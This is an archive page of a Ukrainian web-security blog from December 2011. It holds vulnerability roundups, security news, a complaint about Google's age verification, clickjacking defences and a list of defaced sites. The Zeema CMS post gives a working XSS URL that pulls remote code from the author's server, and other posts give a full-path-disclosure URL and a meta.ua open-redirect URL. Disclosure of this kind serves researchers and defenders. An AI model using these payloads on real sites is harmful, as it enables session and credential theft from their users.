Архів за Грудень, 2011

Добірка уразливостей

17:03 06.12.2011

В даній добірці уразливості в веб додатках:

Уразливості на zakon.meta.ua

23:56 03.12.2011

У січні, 26.01.2008, я знайшов Cross-Site Scripting та Redirector уразливості на сайті http://zakon.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливість на passport.meta.ua.

XSS:

XSS (Strictly social XSS):

Redirector (URL Redirector Abuse):

http://zakon.meta.ua/law.asp?url=http://websecurity.com.ua

Про цей редиректор я вже писав в 2008 році.

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у січні 2008 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

Новини: призив Microsoft, DDoS атаки та венгерський хакер

22:43 03.12.2011

За повідомленням www.xakep.ru, Microsoft призвала до цілодобового міжнародного співробітництва в мережевій безпеці.

Відповідно до колишнього прокурора США Скота Чарні, гармонізація світових законів і більш швидка взаємодія між правоохоронними органами й іншими учасниками процесу в усіх країнах світу необхідні для прискорення розкриття кіберзлочинів.

Звертаючись до публіки на лондонській конференції, присвяченій кіберпростору, корпоративний віце-президент Trustworthy Computing в Microsoft заявив, що його десятилітній досвід роботи з переслідування кіберзлочинців розкрив “обмеження і повільність міжнародного співробітництва” в цій області. “Нам потрібно гармонізувати національні закони і створити можливості в усіх країнах світу для цілодобової взаємодії”, - сказав він.

За повідомленням www.forbes.ru, атаки хакерів вивели з ладу ряд крупних інформаційних сайтів.

У День виборів у Держдуму ряд крупних російських інформаційних ресурсів у мережі Інтернет піддалися атакам хакерів. Велика кількість новинних сайтів, а також громадських сайтів, що слідкують за проведенням виборів в Росії, зазнали DDoS атак.

За повідомленням www.xakep.ru, хакер був затриманий на співбесіді при працевлаштуванні в готель, який він взломав.

Шукаючий роботу угорський хакер визнав свою провину у вторгненні в системи готелів Marriott перш, ніж зробив спробу одержання там місця роботи методом шантажу.

Аттіла Немет відправив інфіковані трояном повідомлення співробітникам Marriott торік, відповідно до його угоди про визнання провини. Це дозволило йому успішно вилучити конфіденційну фінансову інформацію з мережі готелів. Потім він, очевидно, погрожував розкрити цю інформацію, якщо йому не нададуть місце роботи як співробітника, що підтримує роботу інформаційних систем Marriott.

Даний інцидент, як і всі подібні випадки, показує, що не варто взламувати компанію і потім намагатися там працевлаштуватися (при цьому ще й шантажуючи її) :-) .

Гугл-фішинг (Google-phishing)

20:12 03.12.2011

Розповім вам про Гугл-фішинг (Google-phishing). Це метод проведення фішинг атак Гуглом, з яким я стикнувся сьогодні.

Все почалося з того, що сьогодні моя подруга повідомила про один інцидент, який в неї трапився з поштою Gmail. Який призвів до того, що її акаунт був заблокований Гуглом і вона не може потрапити до свого поштового акаунту. Коли вона згадала про те, що з неї вимагали кошти (оплата кредиткою), в мене одразу з’явилася думка, що це фішинг атака. Але вислухавши всю її розповідь стало зрозуміло, що це саме Гугл її заблокував і почав з неї вимагати гроші або документи. Що я підтвердив, коли на власні очі побачив відповідні повідомлення Гугла, зайшовши в її акаунт. Враховуючи те, як Гугл поводить себе в рамках цієї “верифікації”, я назвав це Гугл-фішингом (Google-phishing).

Процедура, що може призвести до блокування вашого Гугл акаунта і відповідно заблокує вам доступ до всіх сервісів Гугла, якими ви користувалися (Gmail та іншими), називається верифікація віку (age verification). І подібна ситуація, яка трапилася з моєю подругою, коли ваш акаунт може бути заблокований через дану процедуру, може трапитися з будь-яким користувачем сервісів Гугла. Зробивши відповідний пошук в Google, можна знайти сотні тисяч сторінок з розповідями про те, як у людей заблокувалися акаунти. Подібних інцидентів трапилося чимало за останні місяці (я лише зараз про це дізнався, досліджуючи проблему подруги), після того як Гугл увів дану процедуру на своїх сайтах.

Будь-якому користувачу сервісів компанії Google може вивестися повідомлення про необхідність пройти верифікацію віку. І якщо вказати невірні дані (або вірні дані, але людина має недостатній вік), коли вік буде менше 13 років, то акаунт буде заблокований. При блокуванні Гугл виводить “The Google Account for …@gmail.com has been disabled” (для інших сервісів повідомлення відповідне). Більш того, Гугл дає 30 днів на розблокування, після чого акаунт видаляється. І якщо ви цим акаунтом користовулися для пошти, то ваша поштова скринька (з усіма листами) буде видалена, те саме стосується блогів на блог-хостінгу Blogger та інших сервісів Гугла.

Детально про верифікацію віку (age verification) можна прочитати на сайті Гугла. Всього Гугл пропонує три методи розблокування:

  • Оплатити кредиткою - зробити оплату на $0,30 (при цьому банк ще може зняти $1 за проведення транзакції). При цьому компанія обіцяє, що ця сума буде повернута (але це не стосується плати, що може зняти банк).
  • Відправка скана документа, що засвідчує особу та її вік, через сайт.
  • Відправка скана документа через пошту або факс.

Всі ці вимоги Гугла я вважаю перебільшеними. І подібний підхід, щоб заблокувати акаунт, а потім вимагати гроші з кредитки або скан паспорта, я можу назвати тільки як фішинг. В даному випадку Гугл-фішинг, який ще можна назвати Age verification phishing.

І раз Гугл таким займається, то і фішери можуть почати таким займатися. І підроблювати для користувачів сервісів Гугла подібне повідомлення, що мовляв у них акаунт заблокований (та вимагати кошти під видглядом Гугла). Й пропонувати їм оплатити зняття блокування за суму більше ніж $0,30, або ж ті самі $0,30, але при цьому вкрасти дані платіжних карток. Тобто своїми діями Гугл відкрив для фішерів нові можливості по зароблянню коштів.

Окрім Age verification phishing, також може бути проведена атака - Age verification attack. Коли зловмисники атакують (через CSRF або при тимчасовому доступі до акаунту) будь якого користувача сервісів Гугла і заблокують йому акаунт. Після чого йому доведеться витратити час (і потенційно й кошти) для його розблокування. А якщо людина відсутня деякий час (наприклад, поїхала у відпуску), коли сталася дана атака, і термін в 30 днів пройшов, коли вона виявила, що таке трапилося, то людина залишиться без свого акаунта. І без усіх даних, що в ньому знаходилися.

Добірка уразливостей

17:29 03.12.2011

В даній добірці уразливості в веб додатках:

  • VMware vCenter Update Manager fix for Jetty Web server addresses directory traversal vulnerability (деталі)
  • XSS vulnerability in TWiki < 5.0.2 (деталі)
  • PHPCaptcha / Securimage 2.0.2 - Authentication Bypass (деталі)
  • Apache Struts 2, XWork, OpenSymphony WebWork Java Class Path Information Disclosure (деталі)
  • Session hacking via authentication cookie on Oracle CRM on Demand (деталі)
  • libmojolicious-perl security update (деталі)
  • 2WIRE-SINGTEL 2701HGV-E/2700HGV-2/2700HG GATEWAY ROUTER MANAGEMENT AND DIAGNOSTIC CONSOLE VULNERABILITY (деталі)
  • SQL injection in ExtCalendar 2 (деталі)
  • Multiple XSS in phpScheduleIt (деталі)
  • APPLE-SA-2011-11-10-1 iOS 5.0.1 Software Update (Apple iPhone) (деталі)

Уразливість на passport.meta.ua

23:53 02.12.2011

Ще у лиспопаді, 01.11.2006, я знайшов Cross-Site Scripting уразливість на сайті http://passport.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на tv.meta.ua.

XSS:

Дану уразливість вони вже виправили, одразу після моїх численних повідомлень про дірки на їхніх сайтах, як я вияснив ще в 2007 році (коли дійшов час до її оприлюднення). Але виправили вони неякісно, тому уразливість знову працює, при невеликій зміні коду.

XSS (з MouseOverJacking):

Дана уразливість так досі й висить на сайті, як це було до того, як я знайшов її у листопаді 2006 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

Враховуючи, що уразливість на домені passport.meta.ua, де користувачі логіняться в свої акаунти, то її також можна використати для викрадання логінів та паролів користувачів даного портала. Що можна зробити як шляхом фішинга (включаючи on-site фішинг), так і шляхом XSS атаки на менеджери паролів в браузерах.

Методи захисту від ClickJacking

22:42 02.12.2011

Раніше я розповідав про методи захисту від ClickJacking в статті Заголовок X-Frame-Options, де розповів про один з таких методів. А зараз розповім про всі основні методи захисту від ClickJacking. Зазначу, що дані методи (з різною ефективністью) можуть також використовуватися для захисту від MouseOverJacking.

Існують наступні методи захисту від ClickJacking:

  • На стороні клієнта:
    • Ghostery
    • NoScript
    • GuardedID
    • Gazelle
  • На стороні сервера:
    • Framekiller (працює у всіх браузерах)
    • Заголовок X-Frame-Options (вимагає підтримки зі сторони браузера)

Якщо client-side методи вимагають наявності у користувача спеціального плагіна (Ghostery, NoScript чи GuardedID) або спеціального браузера (Gazelle) для захисту від ClickJacking, то server-side методи, зокрема Framekiller, цього не вимагають.

За виключенням заголовка X-Frame-Options. Який вимагає як наявності відповідного браузера (останні версії основних п’яти браузерів), так і необхідності веб розробникам і адмінам сайтів додавати його підтримку на сайтах (щоб сайти виводили даний заголовок), щоб захист спрацював у браузері користувача.

Похакані сайти №171

20:13 02.12.2011

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.sips.gov.ua (хакером Ma3sTr0-Dz) - 20.09.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
  • http://www.sdip.gov.ua (хакером Ma3sTr0-Dz) - 20.09.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
  • http://www.schule8.org.ua (хакером iskorpitx) - 10.08.2011, зараз сайт вже виправлений адмінами
  • http://webkolo.com (хакерами з RKH) - 11.08.2011, зараз сайт вже виправлений адмінами
  • http://larose.pp.ua (хакерами з RKH) - 11.08.2011, зараз сайт вже виправлений адмінами

Уразливості в Zeema CMS

17:27 02.12.2011

22.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Brute Force, Cross-Site Scripting та Full path disclosure уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Це частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

02.12.2011

Brute Force:

http://site/cms/

XSS:

http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)

Атака спрацює в браузерах Mozilla і Firefox.

Full path disclosure:

http://site/search/?page=10&query=site

Уразливі всі версії Zeema CMS.

Низькорівневий пошук уразливостей у веб-додатках

22:43 01.12.2011

В статті PHP-дайвинг: низкоуровневый поиск уязвимостей в веб-приложениях розповідається про низькорівневий пошук уразливостей у веб-додатках, зокрема у PHP-додатках. Який автор статті назвав PHP-дайвінгом.

В даній статті розглянуті наступні аспекти пошуку уразливостей у PHP-додатках на низькому рівні:

  • Ціль дайвінгу.
  • Процес обробки веб-додатку PHP інтерпретатором.
  • Інструменти: Vulcan Logic Dumper (vld), bytekit та evalhook.
  • Приклади дайвінгу.
  • Додаткові техніки.

Пошук уразливостей у PHP-додатках на низькому рівні має свої переваги. Зокрема він може застосовуватися там, де не можна використати аналіз вихідних кодів (whitebox підхід) - при пошуку уразливостей в закритому коді PHP-програм.